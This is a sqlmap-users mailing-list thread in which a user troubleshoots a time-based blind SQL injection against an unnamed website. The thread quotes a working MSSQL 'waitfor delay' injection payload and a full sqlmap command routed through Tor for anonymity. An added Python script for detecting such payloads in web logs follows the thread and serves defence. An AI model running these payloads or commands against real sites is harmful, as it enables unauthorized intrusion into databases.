1) "waitfor delay '0:0:0'" makes no delay and "waitfor delay '0:0:5'"
makes a 5-second delay, and so on.
2) I tried again with --tamper=between and sqlmap verified the
vulnerability.
3) Using Tor in time-based techniques is not the best choice, but I
preferred to be anonymous in pentesting.
Best Regards
On Mon, Dec 8, 2014 at 2:38 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
> For sure it is. sqlmap gives you a huge nagging message in such case
> (network latency...blaballa).
>
> Bye
>
> On Mon, Dec 8, 2014 at 12:06 PM, Robin Wood <robin@digi.ninja> wrote:
>
>> Wouldn't it be a bad idea trying to do a time based attack over Tor?
>>
>> Robin
>>
>> On 8 December 2014 at 11:00, Miroslav Stampar
>> <miroslav.stam...@gmail.com> wrote:
>> > Hi.
>> >
>> > 1) Shouldn't "waitfor delay '0:0:0'" make no delay?
>> > 2) sqlmap says "false positive or unexploitable injection point detected".
>> > Is there a possibility that the character > is filtered?
>> > 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to use
>> > in "false positive check" phase. Then you'll see what fails.
>> >
>> > Bye
>> >
>> > On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hooshman...@gmail.com> wrote:
>> >>
>> >> Hi,
>> >>
>> >> There is a website that is vulnerable to SQL injection. I have checked and
>> >> I'm sure there is a blind SQL injection vulnerability, but sqlmap could not
>> >> find this.
>> >> I tried this command:
>> >> ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent --risk 3 --level 3 --technique=T --dbms="MsSQL"
>> >> and the output was something like this:
>> >> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase
>> >> time-based blind' injectable
>> >> [INFO] checking if the injection point on GET parameter 'search' is a
>> >> false positive
>> >> [WARNING] false positive or unexploitable injection point detected
>> >> [WARNING] GET parameter 'search' is not injectable
>> >>
>> >>
>> >> The "search" parameter is vulnerable to this payload: '); waitfor delay '0:0:0' --
>> >>
>> >> Did I make a mistake, or did sqlmap not find that?
>> >>
>> >> Best Regards
>> >>
>> >>
>> >>
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sqlmap-users@lists.sourceforge.net
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
http://about.me/hooshmand
Public Key <http://scriptics.ir/pub_key/hooshmand_pub.asc>
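
For whoever reviews the web logs of an application tested this way, the following is an added example (not code from this thread or from sqlmap) that finds requests carrying the `waitfor delay` payload quoted above and compares the requested delay with the logged response time. The log layout, the `/find` path, the `SAMPLE_LOG` lines and the `slack` parameter are constructed assumptions, and the time field is assumed to be measured by the server.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines: method, URL, status, server response time (s).
SAMPLE_LOG = """\
GET /find?search=shoes 200 0.212
GET /find?search=%27%29%3B+waitfor+delay+%270%3A0%3A0%27+-- 200 0.198
GET /find?search=%27%29%3B+WAITFOR+DELAY+%270%3A0%3A5%27+-- 200 5.241
GET /find?search=%27%29%3B+waitfor+delay+%270%3A0%3A5%27+-- 403 0.031
GET /find?search=wait+for+delay 200 0.205
"""

WAITFOR = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)'", re.IGNORECASE)

def requested_delay(value):
    """Return the seconds asked for by a WAITFOR DELAY in value, or None."""
    m = WAITFOR.search(value)
    if not m:
        return None
    hours, minutes, seconds = (int(x) for x in m.groups())
    return hours * 3600 + minutes * 60 + seconds

def triage(log_text, slack=0.5):
    """Classify every request whose query parameters carry a WAITFOR DELAY."""
    findings = []
    for line in log_text.splitlines():
        method, url, status, elapsed = line.split()
        # parse_qsl percent-decodes values and turns '+' into spaces.
        for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            delay = requested_delay(value)
            if delay is None:
                continue
            if delay == 0:
                verdict = "probe"         # zero delay: nothing to measure
            elif float(elapsed) >= delay - slack:
                verdict = "executed"      # server waited: statement reached the DBMS
            else:
                verdict = "not-executed"  # rejected or not interpreted as SQL
            findings.append((name, delay, status, verdict))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Server-side timing is used because it does not include the client's network path, which is the latency concern raised in the thread about running time-based checks over Tor.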